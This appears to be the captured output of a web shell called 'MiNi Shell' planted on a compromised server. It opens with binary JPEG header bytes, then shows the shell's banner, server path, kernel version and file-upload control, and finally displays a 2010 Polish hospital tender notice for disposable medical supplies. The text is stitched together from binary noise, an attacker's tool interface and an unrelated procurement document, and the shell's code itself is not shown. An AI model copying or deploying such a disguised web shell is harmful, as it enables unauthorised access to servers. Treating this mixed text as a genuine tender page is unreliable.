JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100826/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100826/266658-N-2010.html

<p class="kh_header"><b>Szczecin: Dostawa wyrobów medycznych jednorazowego użytku, papierów rejestrujących do urządzeń medycznych, testów oraz rękawów do sterylizacji dla Samodzielnego Publicznego Wojewódzkiego Szpitala Zespolonego w Szczecinie 
przy ulicy Arkońskiej 4</b><br>
<b>Numer ogłoszenia: 266658 - 2010; data zamieszczenia: 26.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Wojewódzki Szpital Zespolony , ul. Arkońska 4, 71-455 Szczecin, woj. zachodniopomorskie, tel. 091 813 90 76, faks 091 813 9079.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spwsz.szczecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wyrobów medycznych jednorazowego użytku, papierów rejestrujących do urządzeń medycznych, testów oraz rękawów do sterylizacji dla Samodzielnego Publicznego Wojewódzkiego Szpitala Zespolonego w Szczecinie 
przy ulicy Arkońskiej 4.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa wyrobów medycznych jednorazowego użytku, papierów rejestrujących do urządzeń medycznych, testów oraz rękawów do sterylizacji dla Samodzielnego Publicznego Wojewódzkiego Szpitala Zespolonego w Szczecinie przy ulicy Arkońskiej 4 - w rozbiciu na 17 zadań.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-9, 33.18.62.00-9, 22.99.30.00-7, 33.19.40.00-6, 34.92.84.80-6, 33.14.16.40-8, 33.14.16.15-4, 33.14.14.11-4, 33.14.13.23-0, 33.14.13.21-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 17.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wykonawcy wnoszą wadium w terminie do dnia 09.09.2010 r. do godz. 09:00,w wysokości:  Zadanie nr 1 -   450,00 zł;
Zadanie nr 2  -   nie wymaga się wniesienia wadium;
Zadanie nr 3  -   280,00 zł;
Zadanie nr 4 -   120,00 zł;
Zadanie nr 5 -   200,00 zł;
Zadanie nr 6 - 4 220,00 zł;
Zadanie nr 7 -    410,00 zł;
Zadanie nr 8 - 4 050,00 zł;
Zadanie nr 9 -    140,00 zł;
Zadanie nr 10 -    920,00 zł;
Zadanie nr 11 -  300,00 zł;
Zadanie nr 12 -   830,00 zł;
Zadanie nr 13 -  nie wymaga się wniesienia wadium;
Zadanie nr 14 -  990,00 zł;
Zadanie nr 15 -  180,00 zł;
Zadanie nr 16-    310,00 zł;
Zadanie nr 17 -   800,00 zł
2.Wadium może być wnoszone w formach wynikających z art. 45 ustawy:
1)w pieniądzu - przelewem na konto Zamawiającego ING Bank Śląski S.A.
60 1050 1559 1000 0023 4179 6064 (w tytule należy wpisać numer postępowania)
2)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej (z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym), gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2)  ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości - - oryginał dokumentu powinien być w osobnej kopercie z dopiskiem WADIUM złożony w Kancelarii Zamawiającego w budynku Z razem z ofertą, natomiast kopia potwierdzona za zgodność z oryginałem powinna zostać zamieszczona w ofercie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1)Oświadczenie Wykonawcy, zawarte w załączniku  nr 1 do SIWZ o przynależności 
przez oferowane wyroby do odpowiednich klas wyrobów medycznych: I, IIa, IIb lub III.
Konsekwencją złożenia oświadczenia jest bezwzględne załączenie do oferty odpowiednio  dokumentów:
-Deklaracja zgodności z CE dla wyrobów medycznych klasy I,
-Certyfikat CE i deklaracja zgodności z CE dla wyrobów medycznych klasy IIa,              
-Kopia wpisu lub zgłoszenia do Rejestru Wytwórców i Wyrobów Medycznych dla wyrobów medycznych klasy IIb i III
2)katalog (strony katalogu lub foldery, ulotki informacyjne wystawione lub potwierdzone przez producenta) - w j. polskim do oferowanych wyrobów</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)ofertę cenową zgodnie z rozdziałem I pkt 3;
W przypadku składania oferty wspólnej należy złożyć jeden dokument;
2)odpowiednie pełnomocnictwa;
Tylko w sytuacjach określonych w rozdziale I pkt 5 zdanie drugie SIWZ lub w przypadku składania oferty wspólnej (rozdział III pkt 1 SIWZ);
3)Oświadczenie wykonawcy, zawarte w załączniku  nr 1 do SIWZ, iż:
-zapoznał się z warunkami zawartymi w SIWZ oraz projekcie umowy i akceptuje je w całości,
-próbki dostarczone są nieodpłatnie, oraz w przypadku wybrania oferty najkorzystniejszej i w przypadku nie złożenia wniosku o zwrot próbek, próbki złożone w postępowaniu przechodzą nieodpłatnie na własność Zamawiającego,
4)Dowód wniesienia wadium.
5)wypełniony załącznik nr 1 - B (wymagane parametry) - dla przedmiotu zmówienia z zadania nr 16</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spwsz.szczecin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Wojewódzki Szpital Zespolony, ul. Arkońska 4, 71-455 Szczecin - Sekcja Zamówień Publicznych pokój nr 28..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.09.2010 godzina 09:00, miejsce: Kancelaria Samodzielnego Publicznego Wojewódzkiego Szpitala Zespolonego w 
Szczecinie; ul. Arkońska 4, budynek Z..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Rurki intubacyjne oraz ustno-gardłowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Rurka intubacyjna z mankietem wykonana z termoplastycznego PCV lub silikonu z balonikiem niskociśnieniowym i oczkiem Murphyego do krótko i średnio trwającej intubacji, sterylna, umożliwiająca swobodne (bezpieczne) wprowadzenie cewnika u pacjenta, rozmiar 3.0-20sztuk;
2.Rurka intubacyjna z mankietem wykonana z termoplastycznego PCV lub silikonu z balonikiem niskociśnieniowym i oczkiem Murphyego do krótko i średnio trwającej intubacji, sterylna, umożliwiająca swobodne (bezpieczne) wprowadzenie cewnika u pacjenta, rozmiar 3.5-15 sztuk;
3.Rurka intubacyjna z mankietem wykonana z termoplastycznego PCV lub silikonu z balonikiem niskociśnieniowym i oczkiem Murphyego do krótko i średnio trwającej intubacji, sterylna, umożliwiająca swobodne (bezpieczne) wprowadzenie cewnika u pacjenta, rozmiar 4.0-90 sztuk;
4.Rurka intubacyjna z mankietem wykonana z termoplastycznego PCV lub silikonu z balonikiem niskociśnieniowym i oczkiem Murphyego do krótko i średnio trwającej intubacji, sterylna, umożliwiająca swobodne (bezpieczne) wprowadzenie cewnika u pacjenta, rozmiar 4.5-110 sztuk;
5.Rurka intubacyjna z mankietem wykonana z termoplastycznego PCV lub silikonu z balonikiem niskociśnieniowym i oczkiem Murphyego do krótko i średnio trwającej intubacji, sterylna, umożliwiająca swobodne (bezpieczne) wprowadzenie cewnika u pacjenta, rozmiar 5.0-110 sztuk;
6.Rurka intubacyjna z mankietem wykonana z termoplastycznego PCV lub silikonu z balonikiem niskociśnieniowym i oczkiem Murphyego do krótko i średnio trwającej intubacji, sterylna, umożliwiająca swobodne (bezpieczne) wprowadzenie cewnika u pacjenta, rozmiar 5.5-90 sztuk;
7.Rurka intubacyjna z mankietem wykonana z termoplastycznego PCV lub silikonu z balonikiem niskociśnieniowym i oczkiem Murphyego do krótko i średnio trwającej intubacji, sterylna, umożliwiająca swobodne (bezpieczne) wprowadzenie cewnika u pacjenta, rozmiar 6.0-60 sztuk;
8.Rurka intubacyjna z mankietem wykonana z termoplastycznego PCV lub silikonu z balonikiem niskociśnieniowym i oczkiem Murphyego do krótko i średnio trwającej intubacji, sterylna, umożliwiająca swobodne (bezpieczne) wprowadzenie cewnika u pacjenta, rozmiar 6.5-40 sztuk;
9.Rurka intubacyjna z mankietem wykonana z termoplastycznego PCV lub silikonu z balonikiem niskociśnieniowym i oczkiem Murphyego do krótko  i średnio trwającej intubacji, sterylna, umożliwiające swobodne (bezpieczne) wprowadzenie cewnika u pacjenta,  rozmiar 7.0-1 000 sztuk;
10.Rurka intubacyjna z mankietem wykonana z termoplastycznego PCV lub silikonu z balonikiem niskociśnieniowym i oczkiem Murphyego do krótko i średnio trwającej intubacji, sterylna, umożliwiające swobodne (bezpieczne) wprowadzenie cewnika u pacjenta, rozmiar 7.5-1 100 sztuk;
11.Rurka intubacyjna z mankietem wykonana z termoplastycznego PCV lub silikonu z balonikiem niskociśnieniowym i oczkiem Murphyego do krótko i średnio trwającej intubacji, sterylna, umożliwiające swobodne (bezpieczne) wprowadzenie cewnika u pacjenta, rozmiar 8.0-1 100 sztuk;
12.Rurka intubacyjna z mankietem wykonana z termoplastycznego PCV lub silikonu z balonikiem niskociśnieniowym i oczkiem Murphyego do krótko i średnio trwającej intubacji, sterylna, umożliwiające swobodne (bezpieczne) wprowadzenie cewnika u pacjenta,  rozmiar 8.5-600 sztuk;
13.Rurka intubacyjna z mankietem wykonana z termoplastycznego PCV lub silikonu z balonikiem niskociśnieniowym i oczkiem Murphyego do krótko i średnio trwającej intubacji, sterylna, umożliwiające swobodne (bezpieczne) wprowadzenie cewnika u pacjenta, rozmiar 9-30 sztuk;
14.Rurka intubacyjna z mankietem wykonana z termoplastycznego PCV lub silikonu z balonikiem niskociśnieniowym i oczkiem Murphyego do długotrwałej intubacji, sterylna, umożliwiające swobodne (bezpieczne) wprowadzenie cewnika u pacjenta, z możliwością odsysania z przestrzeni podgłośniowej,  rozmiar 7.0-50 sztuk;
15.Rurka intubacyjna z mankietem wykonana z termoplastycznego PCV lub silikonu z balonikiem niskociśnieniowym i oczkiem Murphyego do długotrwałej intubacji, sterylna, umożliwiające swobodne (bezpieczne) wprowadzenie cewnika u pacjenta, z możliwością odsysania z przestrzeni podgłośniowej,  rozmiar 7.5-50 sztuk;
16.Rurka intubacyjna z mankietem wykonana z termoplastycznego PCV lub silikonu z balonikiem niskociśnieniowym i oczkiem Murphyego do długotrwałej intubacji, sterylna, umożliwiające swobodne (bezpieczne) wprowadzenie cewnika u pacjenta, z możliwością odsysania z przestrzeni podgłośniowej,  rozmiar 8.0-80 sztuk;
17.Rurka intubacyjna z mankietem wykonana z termoplastycznego PCV lub silikonu z balonikiem niskociśnieniowym i oczkiem Murphyego do długotrwałej intubacji, sterylna, umożliwiające swobodne (bezpieczne) wprowadzenie cewnika u pacjenta, z możliwością odsysania z przestrzeni podgłośniowej,  rozmiar 8.5-60 sztuk;
18.Rurka intubacyjna z mankietem wykonana z termoplastycznego PCV lub silikonu z balonikiem niskociśnieniowym i oczkiem Murphyego do długotrwałej intubacji, sterylna, umożliwiające swobodne (bezpieczne) wprowadzenie cewnika u pacjenta, z możliwością odsysania z przestrzeni podgłośniowej,  rozmiar 9-60 sztuk;
19.Rurka ustno- gardłowa, jednorazowego użytku, sterylna, nr 00-20 sztuk;
20.Rurka ustno- gardłowa, jednorazowego użytku, sterylna, nr  0-30 sztuk;
21.Rurka ustno- gardłowa, jednorazowego użytku, sterylna, nr  1-30 sztuk;
22.Rurka ustno- gardłowa, jednorazowego użytku, sterylna, nr  2-1 200 sztuk;
23.Rurka ustno- gardłowa, jednorazowego użytku, sterylna, nr  3-1 200 sztuk;
24.Rurka ustno- gardłowa, jednorazowego użytku, sterylna, nr  4-10 sztuk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Igły do znieczuleń podpajęczynówkowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Igły do znieczuleń podpajęczynówkowych Atrucan z igłą prowadzącą, sterylne, 26G/88-100mm-100 sztuk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.21-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Igły do znieczuleń podpajęczynówkowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Igły do znieczuleń podpajęczynówkowych Pencil-Point z igłą prowadzącą, sterylne, 22G/88-90m-20 sztuk;
2.Igły do znieczuleń podpajęczynówkowych Pencil-Point z igłą prowadzącą, sterylne, 25G/88-100m-700 sztuk;
3.Igły do znieczuleń podpajęczynówkowych Pencil-Point z igłą prowadzącą, sterylne, 26G/88-100m-100 sztuk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.21-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Igła punkcyjna do nakłuć lędźwiowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Igła punkcyjna do nakłuć lędźwiowych, sterylna, jednorazowego użytku, 0,7x40 22G/40-50mm-50 sztuk;
2.Igła punkcyjna do nakłuć lędźwiowych, sterylna, jednorazowego użytku, 0,7x90 22G/90mm-200 sztuk;
3.Igła punkcyjna do nakłuć lędźwiowych, sterylna, jednorazowego użytku, 1,2x90 18G/ 90mm-500 sztuk;
4.Igła punkcyjna do nakłuć lędźwiowych, sterylna, jednorazowego użytku, 0,9x90 20G/90mm-1 300 sztuk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.23-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Igła do biopsji stercza.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Igła do biobsji stercza 18G, długość 25cm, sterylna, jednorazowego użytku do automatycznego aparatu do biobsji PRO - MAG ULTRA lub równoważna.-250 sztuk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.23-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Drobny sprzęt medyczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Dren do odsysania ran typ Redon z trocarem jednorazowym, jałowy,   10F dł. 800mm-600 sztuk;
2.Dren do odsysania ran typ Redon jałowy, 10F dł.580mm	-200 sztuk;
3.Dren do odsysania ran typ Redon jałowy, 12F dł.580mm	-200 sztuk;
4.Dren do odsysania ran typ Redon jałowy,14F dł.580mm	-1 200 sztuk;
5.Dren do odsysania ran typ Redon z trocarem jednorazowym, jałowy,16F dł.800mm-2500 sztuk;
6.Dren do odsysania ran typ Redon jałowy  16F dł.800mm	-1 500 sztuk;
7.Zestaw do nakłuć opłucnej z kaniulą 14G x 80mm, jałowy, z drenem, strzykawką 60ml,workiem 2 litrowym i kranikiem trójdrożnym, z igłą Verresa lub równoważny-200 sztuk;
8.Igły do pena, sterylne, 0,33x12mm i 0,30x8mm - zamawiane w obydwu rozmiarach, w zależności od potrzeb Szpitala-2 200 sztuk;
9.Igła do trepanobiobsji -talerza biodrowego, sterylna, jednorazowego użytku, 11G, śred. 3mm, dł.150mm-30 sztuk;
10.Ostrza chirurgiczne jednorazowego użytku, sterylne, nr 10A a100 sztuk-100 opakowań;
11.Ostrza chirurgiczne jednorazowego użytku, sterylne, nr 11 a100 sztuk- 60 opakowań;
12.Ostrza chirurgiczne jednorazowego użytku, sterylne, nr 13 a 100 sztuk-20 opakowań;
13.Ostrza chirurgiczne jednorazowego użytku, sterylne, nr 15 a100 sztuk-25 opakowań;
14.Ostrza chirurgiczne jednorazowego użytku, sterylne, nr 22 a100 sztuk-80 opakowań;
15.Ostrza chirurgiczne jednorazowego użytku, sterylne, nr 23 a100 sztuk-80 opakowań;
16.Ostrza chirurgiczne jednorazowego użytku, sterylne, nr 24 a100 sztuk-20 opakowań;
17.Podłoże transportowe z aplikatorem jałowe, pakowane pojedynczo, z marginesem do otwierania (pakowane papier - folia)-9 000 sztuk;
18.Pojemnik na kał z łopatką, zamykany, jałowy	-7 000 sztuk;
19.Pojemnik na mocz z nakrętką, poj. 150 ml -45 000 sztuk;
20.Pojemnik na mocz jałowy z nakrętką, poj. 150 ml (pakowany papier - folia)-
2 200 sztuk;
21.Pojemnik na płyn ustrojowy z nakrętką, pakowany pojedynczo, jałowy, 20ml-
13 000 sztuk;
22.Kieliszki do leków plastikowe-400 000 sztuk;
23.Worek do dobowej zbiórki moczu 2l jałowy z odpływem, z jednokierunkowym zaworem zwrotnym	-18 000 sztuk;
24.Woreczek do pobierania próbek moczu, jałowy dla dzieci dla chłopców i dziewczynek (po 900)-1 800 sztuk;
25.Worek do godzinowej zbiórki moczu, sterylny, o pojemności 2000 ml, skalowany co 50ml, z zastawką antyrefluksyjną i zaworem spustowym. Dren łączący 120cm wykonany z materiału zapobiegającego jego zaginaniu i skręcaniu się zakończony uniwersalnym łącznikiem schodkowym.	-80 sztuk;
26.System zamknięty do dobowej zbiórki moczu, 14 dniowy z workiem o poj. 2l  z zastawką antyrefluksyjną i portem-500 sztuk;
27.Rękawice foliowe niejałowe jednorazowego użytku, opakowane a100sztuk-1 500 opakowań;
